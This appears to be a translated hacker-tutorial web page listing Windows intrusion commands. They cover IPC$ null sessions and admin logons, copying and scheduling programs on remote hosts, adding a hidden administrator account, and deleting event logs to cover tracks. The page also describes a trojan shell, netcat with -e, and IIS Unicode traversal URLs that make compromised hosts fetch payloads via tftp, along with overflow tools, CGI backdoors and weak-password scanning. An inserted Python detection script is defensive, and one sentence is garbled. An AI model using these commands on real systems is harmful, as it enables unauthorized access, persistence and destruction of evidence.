Basic commands that network administrators and hackers should know!

Source: Internet
Author: User

Basic commands that every network administrator and hacker must know.
Several common net commands:
(Establish a null connection with the remote host) net use \\<IP address>\ipc$ "" /user:""
(Log on to the remote host as an administrator) net use \\<IP address>\ipc$ "password" /user:"Administrator"
(Transfer a file to the WINNT directory of the remote host) copy <local directory path>\<program> \\<IP address>\admin$
(View the remote host's time) net time \\<IP address>
(Start a program at a scheduled time) at \\<IP address> <time> readme.exe
(View shares) net view \\<IP address>
(View the NetBIOS workgroup list) nbtstat -A <IP address>
(Map drive C of the remote host to your own drive F) net use f: \\<IP address>\c$ "" /user:"Administrator"
(These two commands add yourself to the Administrators group)
net user <username> <password> /add
net localgroup Administrators <username> /add
(Disconnect) net use \\<IP address>\ipc$ /delete
Cleaning up afterwards:
del c:\winnt\system32\logfiles\*.*
del c:\winnt\system32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
I. netsvc.exe
The following commands list the services on a host, then query and remotely start the host's "scheduled tasks" service:
netsvc /list \\<IP address>
netsvc schedule \\<IP address> /query
netsvc \\<IP address> schedule /start
II. opentelnet.exe
Opens the Telnet service on the host and binds its port to 7878, for example:
opentelnet \\<IP address> <username> <password> 1 7878
Then telnet to port 7878 of the host to enter DOS mode:
telnet <IP address> 7878
III. winshell.exe
A very small Trojan (less than 6 KB). Telnet to port 7878 of the host and enter the password winshell; once you see CMD> you can issue commands:
path (view the path of the winshell main program)
reboot (restart the machine)
shutdown (shut down the machine)
shell (after execution you will see the familiar "C:\>" prompt)
exit (exit this logon session; this command does not terminate winshell)
CMD> http://.../srv.exe (download a file from a website over HTTP to the machine running winshell)
IV. 3389 login tool: log on to the remote host through a GUI.
V. elsave.exe
Event log clearing tool.
elsave -s \\<IP address> -l "application" -C
elsave -s \\<IP address> -l "system" -C
elsave -s \\<IP address> -l "security" -C
After these commands run, the application, system and security logs are cleared.
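
Seen from the defender's side, the net, at, del and elsave commands listed above leave distinctive process command lines. The following Python code is an added example, not part of the original page: it matches such command lines and flags hosts where access or account changes are followed by log clearing. The rule names, host names and sample events are constructed, and it assumes command lines are available from process-creation logging.

```python
import re

# Rule name -> regex over one process command line (matched case-insensitively).
# Patterns mirror the command forms listed on this page; names are illustrative.
RULES = {
    "ipc_null_session": r'\bnet\s+use\s+\\\\\S+\\ipc\$\s+""\s*/user:\s*""',
    "ipc_admin_logon": r'\bnet\s+use\s+\\\\\S+\\ipc\$\s+"[^"]+"\s*/user:',
    "admin_share_use": r'\\\\\S+\\(admin|c)\$',
    "remote_at_job": r'\bat\s+\\\\\S+\s+\S+',
    "account_added": r'\bnet\s+user\s+\S+\s+\S+\s*/add\b',
    "admin_group_add": r'\bnet\s+localgroup\s+administrators\s+\S+\s*/add\b',
    "log_file_delete": r'\bdel\s+\S*\\winnt\\(system32\\)?\S*\*\.(\*|evt|log|txt)',
    "elsave_clear": r'\belsave\b.*\s-c\b',
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}
CLEARING = {"log_file_delete", "elsave_clear"}

def classify(cmdline):
    """Return the sorted rule names that match one command line."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(cmdline))

def scan(events):
    """events: iterable of (host, cmdline). Returns {host: set of rule names}."""
    hits = {}
    for host, cmd in events:
        for name in classify(cmd):
            hits.setdefault(host, set()).add(name)
    return hits

def cleanup_after_access(hits):
    """Hosts showing both an access/account rule and a log-clearing rule."""
    return sorted(h for h, n in hits.items() if n & CLEARING and n - CLEARING)

# Constructed sample events (documentation IP range, made-up host names).
SAMPLE = [
    ("ws01", r'net use \\192.0.2.10\ipc$ "" /user:""'),
    ("ws01", r'copy tool.exe \\192.0.2.10\admin$'),
    ("ws01", r'at \\192.0.2.10 02:18 readme.exe'),
    ("srv02", r'net user svc_tmp Passw0rd1 /add'),
    ("srv02", r'net localgroup Administrators svc_tmp /add'),
    ("srv02", r'del c:\winnt\system32\config\*.evt'),
    ("ws03", r'net view \\192.0.2.10'),
    ("ws03", r'elsave -s \\192.0.2.10 -l "security" -C'),
]

if __name__ == "__main__":
    found = scan(SAMPLE)
    for host in sorted(found):
        print(host, sorted(found[host]))
    print("access followed by log clearing:", cleanup_after_access(found))
```
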
VI. hbulot.exe
Enables the 3389 service on Win2k Server and WinXP.
hbulot [/r]
With /r, the target restarts automatically after installation so that the setting takes effect.
VII. nc.exe (netcat.exe)
A handy tool; some scripts need it, and it can also be used to connect after an overflow.
Connect to somewhere: nc [-options] hostname port[s] [ports] ...
Bind a port and wait for a connection: nc -l -p port [-options] [hostname] [port]
Parameters:
-e prog     program redirection; runs once connected [dangerous!]
-g gateway  source-routing hop point[s], up to 8
-G num      source-routing pointer: 4, 8, 12, ...
-h          help information
-i secs     delay interval
-l          listening mode, for inbound connections
-n          numeric IP addresses only; hostnames cannot be used
-o file     record the traffic as a hexadecimal dump
-p port     local port number
-r          choose local and remote ports at random
-s addr     local source address
-u          UDP mode
-v          verbose output; use -v twice for more detail
-w secs     timeout
-z          turn off input and output (used when scanning)
VIII. tftpd32.exe
Temporarily turns your computer into an FTP server so that compromised hosts ("bots") can download files. The tftp command must be run on the compromised host, usually through the Unicode vulnerability or telnet.

For example:
http://<IP address>/scripts/...%255c..%255c/winnt/system32/cmd.exe?/c tftp -i <local IP address> get <file name> c:\winnt\system32\<file name>

Then you can run the file directly:
http://<IP address>/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+<file name>

IX. prihack.exe is the IIS printer remote buffer overflow tool.
idqover.exe overflows idq. Select "listen on a port after overflow", then use telnet to connect to the listening port. If the overflow succeeds, the command bound to the port is executed immediately. xploit.exe is a graphical-interface IDA overflow tool. After successful wiWin in NXPXP.

X. ntis.exe, cmd.exe and cmdasp.asp are three CGI backdoors. Put the EXE files in the cgi-bin directory and the ASP file in a directory with ASP execute permission, then connect with the IE browser.
XI. xscan command-line parameters:
During a scan, press the [Space] key to view the status of each thread and the scan progress, press the "Q" key to save the data and exit the program, and press "" to forcibly close the program.

1. Command format:
xscan -host <start IP>[-<end IP>] <check item> [other options]
xscan -file

The <check item> values have the following meanings:
-port: checks the port status of common services (the list of ports to check can be customized through the "PORT-SCAN-OPTIONS\PORT-LIST" item in \dat\config.ini);
-ftp: detects weak FTP passwords (the username/password dictionary files can be set in \dat\config.ini);
-ntpass: detects weak NT-Server passwords (the username/password dictionary files can be set in \dat\config.ini);
-cgi: detects CGI vulnerabilities (the encoding scheme can be set through the "CGI-ENCODE\encode_type" item in \dat\config.ini);
-iis: detects IIS vulnerabilities (the encoding scheme can be set through the "CGI-ENCODE\encode_type" item in \dat\config.ini);

The [other options] have the following meanings:
-v: display the detailed scan progress
-p: skip hosts that cannot be pinged
-o: skip hosts on which no open port is detected
-t <number of concurrent threads[,number of concurrent hosts]>: maximum number of concurrent threads and number of concurrent hosts. The default quantity is, 10
